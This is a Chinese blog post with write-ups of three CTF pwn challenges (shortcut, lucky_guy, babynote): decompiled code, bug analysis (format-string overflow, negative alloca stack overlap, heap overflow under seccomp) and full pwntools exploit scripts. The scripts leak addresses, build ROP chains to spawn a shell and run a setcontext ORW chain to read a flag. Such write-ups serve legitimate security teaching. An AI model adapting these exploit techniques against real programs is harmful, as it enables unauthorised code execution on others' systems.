三个pwn题

最新推荐文章于 2024-07-28 08:55:45 发布
最新推荐文章于 2024-07-28 08:55:45 发布
阅读量1.7k 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/125501761
版权

目录

shortcut

lucky_guy

babynote

shortcut

这个题表面上是个堆题,实际上跟堆关系不大,是个格式化字符漏洞的题。

主程序是菜单有4个功能:add,free,show,run

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // eax

  setbuf(stdout, 0LL);
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  while ( 1 )
  {
    while ( 1 )
    {
      while ( 1 )
      {
        v3 = menu();
        if ( v3 != 2 )
          break;
        list();
      }
      if ( v3 > 2 )
        break;
      if ( v3 != 1 )
        goto LABEL_13;
      add();                                    // formatstr
    }
    if ( v3 == 3 )
    {
      delete();                                 // 可以越界
    }
    else
    {
      if ( v3 != 4 )
LABEL_13:
        die();
      run();
    }
  }
}

add函数这里有个漏洞,由于读入是用的printf,所以很容易用%nc达到写溢出

unsigned __int64 add()
{
  int v1; // [rsp+8h] [rbp-38h] BYREF
  int i; // [rsp+Ch] [rbp-34h]
  char format[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v4; // [rsp+38h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  for ( i = 0; ; ++i )
  {
    if ( i > 4 )
    {
      puts("Too many shortcut!");
      die();
    }
    if ( !*((_QWORD *)&sc + i) )
      break;
  }
  *((_QWORD *)&sc + i) = malloc(0x28uLL);
  puts("the name of new shortcut:");
  read_safely(format, 0x1Eu);
  sprintf(*((char **)&sc + i), format);         // 少参数,printf漏洞
  puts("choose an operation:\n1. health code\n2. express\n");
  _isoc99_scanf("%d", &v1);
  if ( v1 == 1 )
  {
    *(_QWORD *)(*((_QWORD *)&sc + i) + 32LL) = health_code;
  }
  else
  {
    if ( v1 != 2 )
    {
      puts("Wrong choice!");
      die();
    }
    *(_QWORD *)(*((_QWORD *)&sc + i) + 32LL) = express;
  }
  return __readfsqword(0x28u) ^ v4;
}

run函数。chunk尾部有一个指针,run的时候将利用这个指针显示。

unsigned __int64 run()
{
  int i; // [rsp+Ch] [rbp-34h]
  char s1[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v3; // [rsp+38h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("Tell me the name of shortcut:");
  read_safely(s1, 0x1Eu);
  for ( i = 0; i <= 4; ++i )
  {
    if ( *((_QWORD *)&sc + i) && !strncmp(s1, *((const char **)&sc + i), 0x1DuLL) )
    {
      (*(void (__fastcall **)(_QWORD))(*((_QWORD *)&sc + i) + 32LL))(*((_QWORD *)&sc + i));// 执行+32处的指针
      return __readfsqword(0x28u) ^ v3;
    }
  }
  puts("No match!");
  return __readfsqword(0x28u) ^ v3;
}

另外程序本身将system引入,可以执行plt里的system

int treasure()
{
  return system("treasure");
}

由于有一个比较容易的溢出这里就好办了。

1,建一个块,让输入32个字符让它与指针直连,然后list的时候尾部带出指针,得到程序加载地址。

2,再建第2个块,删1再重建,通过写溢出将1的数据溢出到2的指针,覆盖为system,2的数据改为system

3, run(2)得到shell

from pwn import *

p = process('./shortcut')

libc_elf = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./shortcut')
context(arch = 'amd64', log_level='debug')



menu = b"Please tell me your choice:\n"
def add(msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"the name of new shortcut:\n", msg)
    p.sendlineafter(b"choose an operation:\n1. health code\n2. express\n\n", b'1')

def show():
    p.sendlineafter(menu, b'2')

def run(msg):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"Tell me the name of shortcut:\n", msg)

def free(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"Tell me the index of shortcut:\n", str(idx).encode())

add(b'%32c')
show()
p.recv(0x29)
pwn_base = u64(p.recv(6).ljust(8,b'\x00')) - 0xb9c
elf.address = pwn_base
print('pwn:', hex(pwn_base))

system = pwn_base+ 0x988 #elf.plt('system')

add(b'aaa')
free(0)
add(b'%48c'+b'/bin/sh;'+b'%24c'+p64(system))  #覆盖第2个chunk内容为/bin/sh;指针为system

run(b'/bin/sh;'.ljust(0x1d,b' '))

p.interactive()

lucky_guy

这是一个溢出写ROP的题,题目没有开PIE,显然是可以利用题目里的地址进行ROP的题。

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  void *v3; // rsp
  _BYTE v5[4]; // [rsp+0h] [rbp-1B0h] BYREF
  int v6; // [rsp+4h] [rbp-1ACh] BYREF
  int v7; // [rsp+8h] [rbp-1A8h] BYREF
  unsigned int seed; // [rsp+Ch] [rbp-1A4h]
  int v9; // [rsp+10h] [rbp-1A0h]
  int v10; // [rsp+14h] [rbp-19Ch]
  _BYTE *v11; // [rsp+18h] [rbp-198h]
  char v12[392]; // [rsp+20h] [rbp-190h] BYREF
  unsigned __int64 v13; // [rsp+1A8h] [rbp-8h]

  v13 = __readfsqword(0x28u);
  v9 = 10;
  sub_400827();
  for ( seed = 0; (int)seed < v9; ++seed )
  {
    srand(seed);                                // seed已知,rand可以预测
    v10 = rand() % 100;
    puts("your number");
    __isoc99_scanf("%d", &v7);
    if ( v10 != v7 )
    {
      puts("fail");
      exit(0);
    }
  }
  puts("Congratulations you passed the first level!");
  puts("I believe you are a lucky guy.");
  puts("So, give me a size: ");
  __isoc99_scanf("%d", &v6);
  v3 = alloca(16 * ((v6 + 16 + 30LL) / 0x10uLL));// 移动rsp
  v11 = v5;
  sub_4008B9(v5, v6, v12);
  return 0LL;
}

main里先是让输入10个数,与随机数相同可进入下一步。由于seed用的数已知,所以rand是可预知的,可以写个小程序将10个数输出

#include <stdio.h>
#include <stdlib.h>

int main(){
    for ( int seed = 0; (int)seed < 10; ++seed ){ srand(seed); printf("%d\n", rand() % 100); }
}

10个数字通过后,会让输入一个数字,然后通过它进行一个alloca,这个看上去像函数的东西实际上不是函数,只是把运算结果赋值给rsp

.text:0000000000400A68 B8 10 00 00 00                mov     eax, 10h
.text:0000000000400A6D 48 83 E8 01                   sub     rax, 1
.text:0000000000400A71 48 01 D0                      add     rax, rdx
.text:0000000000400A74 BE 10 00 00 00                mov     esi, 10h
.text:0000000000400A79 BA 00 00 00 00                mov     edx, 0
.text:0000000000400A7E 48 F7 F6                      div     rsi
.text:0000000000400A81 48 6B C0 10                   imul    rax, 10h
.text:0000000000400A85 48 29 C4                      sub     rsp, rax

后面的函数会进行两次输入,

unsigned __int64 __fastcall sub_4008B9(void *a1, int a2, void *a3)
{
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  puts("Your message: ");
  read(0, a1, a2);
  puts("Leave your name: ");
  read(0, a3, 0x30uLL);
  return __readfsqword(0x28u) ^ v5;
}

第一次写入v5这个与rsp关联,第二次是写v12这是个固定位置

所以这个题的漏洞就在于当输入负数,使rsp下移后,sub_4008B9的栈会下移跟主函数栈空间重叠。sub_4008B9的返回地址恰巧落在v12指针处时,就可以通过写入v12改写sub_4008B9的返回地址,在这里写ROP链。

具体操作:

from pwn import *

p = process('./lucky_guy')
elf = ELF('./lucky_guy')
libc_elf = ELF('/home/shi/libc/libc6_2.31/lib/x86_64-linux-gnu/libc-2.31.so')

context(arch='amd64', log_level='debug')

pop_rdi = 0x0000000000400b43 #: pop rdi ; ret

a = [83,83,90,46,1,75,41,77,96,15]

#第一次 puts(got_puts),start 获取libc
for i in a:
    p.sendlineafter(b"your number", str(i).encode())
payload = flat(0, pop_rdi+1, pop_rdi, elf.got['puts'], elf.plt['puts'], 0x400740) #start 
p.sendlineafter(b"So, give me a size: ", str(-0x50).encode()) #
p.sendafter(b"Leave your name: \n", payload)

libc_base = u64(p.recvuntil(b'\x7f').ljust(8, b'\x00')) - libc_elf.sym['puts']
libc_elf.address = libc_base
print('libc:', hex(libc_base))

#第二次 system(/bin/sh)
for i in a:
    p.sendlineafter(b"your number", str(i).encode())
payload = flat(0, pop_rdi+1, pop_rdi, next(libc_elf.search(b'/bin/sh')), libc_elf.sym['system'], 0x400740) #start 
p.sendlineafter(b"So, give me a size: ", str(-0x50).encode()) #
p.sendafter(b"Leave your name: \n", payload)

p.interactive()

 这里由于题目没有给出libc,所以第一步执行得到一个puts的地址后,需要按尾3位确定libc版本,下载相应libc或者用偏移计算system和/bin/sh的地址,然后再进行下一步。

babynote

这是一个高版本(libc-2.31不太高)libc下seccomp禁用execve功能的ORW题。

漏洞:当对一个加密过的块进行show时,对数据起点标识“:”直接搜索,当输入的key里含“:”引起的写数据溢出。

先分别看下各个函数

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int v4; // [rsp+Ch] [rbp-4h]

  sub_1369(a1, a2, a3);
  sub_152F();
  sub_1432();
  while ( 1 )
  {
    menu();
    v4 = get_int();
    if ( v4 == 5 )
      break;
    if ( v4 <= 5 && v4 > 0 )
    {
      switch ( v4 )
      {
        case 4:
          m4encrypt();
          break;
        case 3:
          m3free();
          break;
        case 1:
          m1add();
          break;
        default:
          m2show();
          break;
      }
    }
    else
    {
      printf("wrong choice");
    }
  }
  return 5LL;
}

main里有4个功能模块:add,show,free,enc

int m1add()
{
  __int64 v0; // rax
  int i; // [rsp+8h] [rbp-8h]
  int v3; // [rsp+Ch] [rbp-4h]

  for ( i = 0; i < dword_5010 && qword_5060[i]; ++i )
    ;
  LODWORD(v0) = dword_5010;
  if ( i < dword_5010 )
  {
    printf("size: ");
    v3 = get_int();
    if ( v3 > dword_5014 || v3 <= 0 )
    {
      printf("wrong note size");
      exit(0);
    }
    qword_5060[i] = malloc(v3);
    v0 = qword_5060[i];
    if ( v0 )
    {
      printf("content: ");
      sub_15A9(qword_5060[i], v3, 10);
      LODWORD(v0) = puts("done");
    }
  }
  return v0;
}

add限制最大f8,指针区没有问题,read数据没有溢出,而且尾部加\0非常安全

unsigned __int64 m2show()
{
  int i; // [rsp+0h] [rbp-40h]
  int v2; // [rsp+4h] [rbp-3Ch]
  int v3; // [rsp+8h] [rbp-38h]
  unsigned int n; // [rsp+Ch] [rbp-34h]
  char *n_4; // [rsp+10h] [rbp-30h]
  void *dest; // [rsp+18h] [rbp-28h]
  char buf[24]; // [rsp+20h] [rbp-20h] BYREF
  unsigned __int64 v8; // [rsp+38h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  printf("index: ");
  v3 = get_int();
  if ( v3 < 0 || v3 >= dword_5010 )
  {
    puts("wrong note index");
    exit(0);
  }
  if ( qword_5060[v3] )
  {
    if ( dword_50E0[v3] == 1 )
    {
      v2 = 0;
      for ( i = 0; i <= 2; ++i )
      {
        printf("encrypt key: ");
        read(0, buf, 0xEuLL);
        if ( !memcmp(buf, (const void *)qword_5060[v3], 0xEuLL) )
        {
          v2 = 1;
          break;
        }
        puts("wrong encrypt key");
      }
      if ( !v2 )
      {
        puts("Please contact administrator to reset password");
        exit(0);
      }
      n_4 = strchr((const char *)qword_5060[v3], 58);
      n = strlen(n_4);
      dest = malloc(dword_5014);
      memcpy(dest, n_4, n);
      printf("content %s\n", (const char *)dest);
      free(dest);
    }
    else
    {
      printf("content: %s\n", (const char *)qword_5060[v3]);
    }
  }
  return __readfsqword(0x28u) ^ v8;
}

show的时候对enc过的先判断key是否正确,再找到“:”(数据起点标记)然后建个f8的块写入数据。这里如果在key里包含“:”则得到的数据长度就会超过f8从而写溢出。

_DWORD *m3free()
{
  _DWORD *result; // rax
  int v1; // [rsp+Ch] [rbp-4h]

  printf("index: ");
  v1 = get_int();
  if ( v1 < 0 || v1 >= dword_5010 )
  {
    puts("wrong note index");
    exit(0);
  }
  result = (_DWORD *)qword_5060[v1];
  if ( result )
  {
    free((void *)qword_5060[v1]);
    qword_5060[v1] = 0LL;
    result = dword_50E0;
    dword_50E0[v1] = 0;
  }
  return result;
}

free函数里free后清理指针和数据块尺寸,没有UAF,也没有溢出。

unsigned __int64 m4encrypt()
{
  size_t v0; // rax
  int v1; // eax
  size_t v2; // rax
  int v4; // [rsp+Ch] [rbp-54h]
  char *v5; // [rsp+20h] [rbp-40h]
  char v6[8]; // [rsp+40h] [rbp-20h] BYREF
  __int64 v7; // [rsp+48h] [rbp-18h]
  unsigned __int64 v8; // [rsp+58h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  v7 = (unsigned int)time(0LL);
  printf("index: ");
  v4 = get_int();
  if ( v4 < 0 || v4 >= dword_5010 )
  {
    puts("wrong note index");
    exit(0);
  }
  if ( qword_5060[v4] )
  {
    if ( dword_50E0[v4] == 1 )
    {
      puts("the note has been encrypted");
    }
    else
    {
      printf("encrypt key: ");
      read(0, v6, 0x10uLL);
      v0 = strlen((const char *)qword_5060[v4]);
      v5 = (char *)malloc(v0 + 21);
      srand(v7);
      v1 = rand();
      *(_DWORD *)v5 = v1 + (v1 == -1);
      memcpy(v5 + 4, v6, 0xAuLL);
      v5[14] = 58;
      v2 = strlen((const char *)qword_5060[v4]);
      memcpy(v5 + 15, (const void *)qword_5060[v4], v2);
      free((void *)qword_5060[v4]);
      qword_5060[v4] = v5;
      dword_50E0[v4] = 1;
      puts("done");
    }
  }
  return __readfsqword(0x28u) ^ v8;
}

enc函数先读入key然后随机生成一个数字作为id,然后按原数据长度+21申请新块将数据复制进去,然后把原块free。

这里有个漏洞:当读入key时v6定义的是8字节,后边是v7,后边用v7来初始化rand种子,而读入v6时可以读入16字节。所以可以用key覆盖v7从而控制种子预测生成的随机数。

加密chunk的结构:id:4 key:10 数据标志符chr(58) data:n 

由于在key里可以写入标志,所以溢出最大可以是10字节。当溢出覆盖下个chunk的头后字符串没有结束\0就可以输入下个chunk的fd从而泄露heap和libc

由于有种种限制,所以要先规划一个行当的chunk布局

思路:

  1. 建第1个F8,然后加密:释放第1个f8使用120
  2. 通过设置key里:的位置便show时写入到2的数据溢出,覆盖3的头(3提前释放到tcache)得到堆地址
  3. 先清理相应块,然后再利用同样方法,先将5释放到unsort,4是最后一个tcache里的F8 通过4show里覆盖5的头得到unsort指针,得到libc
  4. 同理通过6覆盖7的头,修改7的size使其实包含8利用重叠块进行tcache Attack从而达到任意地址写。
  5. 由于有seccomp所以这里作ORW
  6. 先控制tcache+0x90将0x100,0xf0两个指针改为 free_hook和free_hook+0xf8将来写连续的数据(理论上讲这两个块是有重叠的,第2个块没有头,从而两个块写入的数据是连续的)
  7. 原理比较复杂,内容是从原来作过的题上复制的。

通过free_hook写ORW,free_hook内容

  1. gadget_addr: 
  2. fake_frame_addr: free_hook+0x10
  3. frame前一半0x20
  4. frame中间插入setcontext+61
  5. frame后部0x28起填充到0xf8
  6. 文件名
  7. rop_ORW

最后翻译free_hook这个块

from pwn import *

local = 1
if local == 1:
    p = process('./babynote')
    libc_elf = ELF('/lib/x86_64-linux-gnu/libc.so.6')  #(Ubuntu GLIBC 2.31-0ubuntu9.7) stable release version 2.31.
else:
    p = remote('node4.buuoj.cn', 26429) 
    libc_elf = ELF('./libc.so') #(Ubuntu GLIBC 2.31-0ubuntu9.7) stable release version 2.31.

elf = ELF('./babynote')
context.arch = 'amd64'
#context.log_level = 'debug'

menu = b'>> '
def add(size, msg=b'A'):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"size: ", str(size).encode())
    p.sendlineafter(b"content: ", msg)

def show(idx, key):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"index: ", str(idx).encode())
    p.sendafter(b"encrypt key: ", key)

def free(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"index: ", str(idx).encode())

def enc(idx, key):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"index: ", str(idx).encode())
    p.sendafter(b"encrypt key: ", key)

#f8,118,f8*4,18*3,f8*6 
add(0xf8, b'A'*0xf7)
enc(0, b'AA:BBBBB'+ b'00'+b'\x00'*6) #2046264671 
#         1    2                          7                 10                        15
for i in [0xf8,0xf8,0xf8,0xf8,0xf8, 0xf8, 0x18, 0x18, 0x18, 0xf8,0xf8,0xf8,0xf8,0xf8,0xe0]:
    add(i)

for i in [4,3,2]:
    free(i)
show(0, p32(2046264671)+b'AA:BBBBB00')
p.recv(0x108)
heap_base = u64(p.recv(6)+ b'\x00\x00') - 0x6c0
print('heap:', hex(heap_base))

free(0)
free(1)
add(0xf8, b'A'*0xf7)
enc(0, b'AA:BBBBB'+ b'00'+b'\x00'*6) #2046264671 
add(0xf8)  #1

add(0xf8)  #2
add(0xf8)  #3
add(0xf8)  #4

for i in [10,11,12,13,14,6,4,5]:   #tcache 4->6->... 5:unsort
    free(i)
show(0, p32(2046264671)+b'AA:BBBBB00')
p.recv(0x108)
libc_base = u64(p.recv(6)+ b'\x00\x00') - 0x60 - 0x10 - libc_elf.sym['__malloc_hook']
libc_elf.address = libc_base
print('libc:', hex(libc_base))
add(0xf8)  #4

free_hook   = libc_elf.sym['__free_hook']
_environ    = libc_elf.sym['_environ']
setcontext  = libc_elf.sym['setcontext']
syscall     = next(libc_elf.search(asm("syscall; ret")))

pop_rdi     = next(libc_elf.search(asm("pop rdi; ret")))
pop_rsi     = next(libc_elf.search(asm("pop rsi; ret")))
pop_rdx_r12 = next(libc_elf.search(asm("pop rdx; pop r12; ret")))
pop_rax     = next(libc_elf.search(asm("pop rax; ret")))
jmp_rsp     = next(libc_elf.search(asm("jmp rsp")))

#gadget
#0x00000000001518b0 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
gadget_addr= libc_base + 0x00000000001518b0


free(0)
free(1)
add(0xf8, b'A'*0xf7)
enc(0, b'AABBBBBB'+ b'0:'+b'\x00'*6) #872146168
add(0xf8)  #1
show(0, p32(872146168) + b'AABBBBBB'+ b'0:')

for i in [9,8,7]: #7[8]
   free(i)
add(0x38, flat(0,0,0,0x21, heap_base+0xf0)) #5

free(15)

context.log_level = 'debug'

add(0x18, b'A')
add(0x18, flat(0, free_hook+0xf8, free_hook)[:-1])

#orw
fake_frame_addr = free_hook + 0x10
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = fake_frame_addr + 0xF8
frame.rsp = fake_frame_addr + 0xF8 + 0x10
frame.rip = pop_rdi + 1  # : ret


rop_data = [
    libc_elf.sym['open'],
    pop_rdx_r12,0x100,0,pop_rdi,3,pop_rsi,fake_frame_addr + 0x200,libc_elf.sym['read'],
    pop_rdi,fake_frame_addr + 0x200,libc_elf.sym['puts']
    ]

frame_data = flat(frame).ljust(0xf8, b'\x00')
payload = flat(gadget_addr,fake_frame_addr,frame_data[:0x20],setcontext+61,frame_data[0x28:],b'flag\x00\x00\x00\x00',0)+flat(rop_data)
print('len(payload)', hex(len(payload[0xf8:])))

add(0xf8, payload[:0xf7]) #8
add(0xe0, payload[0xf8:]) #9
free(8)

p.recv()
p.interactive()

石氏是时试
关注
专栏目录
PWN基础知识及基础栈溢出手法
山高路远
04-12 4066
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
pwn环境搭建_CTF中pwn的搭建
weixin_39864373的博客
12-19 1798
2017年5月11日 补:1、socat 中有参数reuseaddr,使用的时候加上这个,顾名思义,这个参数的意思就是地址(端口)重用,是为了防止socat绑定失败或者由于某些情况退出时,重新使用此端口需要等待2分钟的时间。如果端口忙,但TCP状态位于 TIME_WAIT ,可以重用端口。如果端口忙,而TCP状态位于其他状态,重用端口时依旧得到一个错误信息,指明”地址已经使用中”。如果你的服务程序...
pwn入门-buu第四页解(32道)(更新完毕,下一章见)
最新发布
2303_79366759的博客
07-28 662
比如我们申请一个0x18大小的chunk,那么top chunk_addr就会增加0x20,然后由于这里的size已经被改成了0xfffffffffff,所以我们可以通过计算target addr与top chunk_addr的距离,从而实现任意地址写。ok,程序逻辑挺简单,漏洞也很明显,这里首先让我们输入一个长整型数据,然后将它进行取值操作,再打印出来,然后再让我们输入一个长整型的数据,并执行 它,很容易可以看出来就是打one_gadget,注意一下输入的格式就好了,目还是挺简单的。
攻防世界pwn--stack2
L0g1c的博客
10-31 539
查看保护机制 (有栈不可执行NX,有canary保护) 用IDA分析(查看伪代码) int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax unsigned int v5; // [esp+18h] [ebp-90h] unsigned int v6; // [esp+1Ch] [ebp-8Ch] int v7; // [esp+20h] [ebp-88h] unsigned
[BUUCTF-pwn] pragyan_police_academy
weixin_52640415的博客
02-06 520
直接给flag的。 先是%s读入有溢出然后用strncmp检查,然后是检查一下串长度是36 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+8h] [rbp-48h] BYREF int v5; // [rsp+Ch] [rbp-44h] char s1[16]; // [rsp+10h] [rbp-40h] BYREF char v7[40]; // [rsp+20
攻防世界pwn——dice_game
qq_62076255的博客
12-19 478
攻防世界pwn——dice_game做记录
ctf - pwn之alarm函数
lifanxin的博客
12-15 2416
目录什么是alarm()为啥要使用alarm()关闭alarm()总结 什么是alarm()   如上图所示,在做一些pwn的时候,我们有时会遇到alarm(0xAu)函数。alarm函数中的参数0xAu是十六进制无符号数,即十进制对应10,所以该函数的作用是在程序运行10秒后,给进程发送SIGALRM信号,如果不另编写程序接受处理此信号,则默认结束此程序。所以运行此样本10秒后的截图如下所示,程序结束时提示Alarm clock: 为啥要使用alarm()   知道什么是alarm(),那么为啥要设
搭建一道PWN
Jason_ZhouYetao的博客
08-12 3178
最近接到任务,说要出几个pwn,所以就去熟悉了一下PWN的搭建: 第一步,准备一道pwn的源码 #include&lt;stdio.h&gt; int main() { int a=1; float key=2018.81,input; if (a==2) { printf("input your key:\n"); scanf("%f",&amp;input); ...
pwn堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5321
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn中的利用。一般来说,想到使用IO_FILE结构,是因为pwn中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
DASCTF&BJDCTF 3rd 三道PWN复现
weixin_44145820的博客
06-21 911
最近看了一下上次安恒五月赛没做出的几道PWN,感觉自己水平还是不够,还要多学习 easybabystack(格式化字符串*, ret2csu) 这有个栈溢出漏洞 但是必须输入正确的密码,否则就直接退出了 还有个格式化字符串漏洞 字符串长度为12 由于密码是/dev/urandom生成的,无法预测。 这里需要利用格式化字符串漏洞的’*'号 %*num$d从栈中取变量作为N 比如num$处的值是0x100,那么这个格式化字符串就相当于%256d 而密码位于18$的位置,我们使用%*18$c就可以打
【计算机系统(2)】3 逆向工程实验
深大cs课程实验及学习笔记,ccfcsp部分真题,华为题库
06-19 2137
本实验设计为一个黑客拆解二进制炸弹的游戏。我们仅给黑客(同学)提供一个二进制可执行文件bomb_64和主函数所在的源程序bomb_64.c,不提供每个关卡的源代码。程序运行中有6个关卡(6个phase),每个关卡需要用户输入正确的字符串或数字才能通关,否则会引爆炸弹(打印出一条错误信息,并导致评分下降)! 要求同学运用GDB调试工具和objdump反汇编工具,通过分析汇编代码,找到在每个phase程序段中,引导程序跳转到“explode_bomb”程序段的地方,并分析其成功跳转的条件...
[ctfbub.pwn] 练习 16-
weixin_52640415的博客
09-07 564
ctfhub pwn练习
undefined reference to `__isoc99_sscanf‘
qq_44347816的博客
05-09 2934
描述: 在交叉编译静态链接库之后,使用该静态库交叉编译可执行文件,但是编译时出现该问,问具体描述如下图: 只是显示没有__isoc99_sscanf的定义,与网上的哪些说是glibc的版本无关。所以就没有所谓的下载2.7版本什么的。 解决方案: 在编译静态链接库时的环境变量中添加-D_GNU_SOURCE,之后再编译静态链接库,再生成可执行文件,成功。 ...
从两道基础简单认识和了解fastbin double free漏洞的利用
weixin_44864859的博客
07-13 1039
fastbin double free原理 Fastbin Double Free 是指 fastbin 的 chunk 可以被多次释放,因此可以在 fastbin 链表中存在多次。这样导致的后果是多次分配可以从 fastbin 链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆 (type confused) 的效果。(即可以构造假的chunk实现任意地址写) Fastbin Double Free 能够成功利用主要有两部分的原因 fastbin 的堆块被释放后
pwn的学习5 passcode
飞花的世界
12-30 856
第五,passcode 还是3个文件,那就首先看C文件 #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1);...
GDB调试堆漏洞之house of spirit
蚁景网安学院
06-25 441
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
ctf pwn 个人经验记录
jmp esp
05-22 8920
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
__isoc99_scanf("%s", var, v4, v5);
11-26
`__isoc99_scanf("%s", var, v4, v5)`是一个C语言中的输入函数,用于从标准输入流中读取字符串并存储在指定的变量中。其中,`%s`表示读取一个字符串,`var`是存储字符串的变量名,`v4`和`v5`是可选的参数,用于指定读取的字符串长度和最大可读取的字符数。如果读取的字符串长度超过了指定的长度,则会发生缓冲区溢出漏洞,可能导致程序崩溃或被攻击者利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值